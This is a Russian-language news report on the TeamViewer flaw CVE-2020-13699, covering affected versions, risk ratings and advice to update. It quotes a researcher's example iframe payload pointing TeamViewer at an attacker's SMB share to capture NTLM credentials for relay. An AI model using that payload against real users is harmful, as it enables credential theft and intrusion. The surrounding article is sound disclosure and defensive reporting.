Специалисты по информационной безопасности обнаружили в TeamViewer критическую уязвимость, с помощью которой киберпреступники могут взломать в Windows пароль пользователя, что позволит им в дальнейшем эксплуатировать систему.
TeamViewer – приложение, которое применяется для обеспечения удаленного доступа и управления разными типами компьютерных систем, мобильных устройств. Также программа предлагает функционал совместной работы и презентаций. По мере развития пандемии по коронавирусу предприятия из разных стран мира стали активнее использовать TeamViewer для обеспечения эффективной удаленной работы.
Найденная ИБ-экспертами уязвимость CVE-2020-13699 является слабым местом в системе безопасности, которое возникает по той причине, что путь или элемент поиска не указываются в кавычках. Отчасти это связано с тем, что программа неверно цитирует пользовательские обработчики URI. Уязвимость может быть использована киберпреступниками, если пользователь с установленной уязвимой версией TeamViewer посещает вредоносные веб-ресурсы.
Джеффри Хофманн, специалист по информационной безопасности компании Praetorian, отметил: «Киберпреступники могут встроить вредоносный iframe на веб-ресурс с созданным URL-адресом (iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs'), за счет чего запустится десктопная версия TeamViewer для Windows и отроется удаленный общий ресурс SMB. Затем Windows выполнит идентификацию NTLM при открытии общего ресурса SMB – за счет этого запрос может быть ретранслирован для выполнения кода».
Ранее эксперты по информационной безопасности уже отмечали, что эксплуатация уязвимости может быть проведена удаленно, поэтому не требуется предварительной аутентификации. Специалисты считаются уязвимость CVE-2020-13699 оптимальной для проведения целенаправленных атак.
При этом эксперты из Praetorian говорят о том, что на данный момент нет никаких доказательств, что уязвимость эксплуатируется хакерами – сейчас просто нет общедоступных эксплойтов. При этом CIS оценивает риск эксплуатации этой уязвимости как «высокий» для крупных и средних государственных и коммерческих организаций, домашних пользователей, средних и малых государственных учреждений.
По информации Praetorian, уязвимость актуальна для приложения TeamViewer версий от 8.0 до 15.8.2, поэтому рекомендовано обновление программы как минимум до версии 15.8.3, в которой данная проблема отсутствует.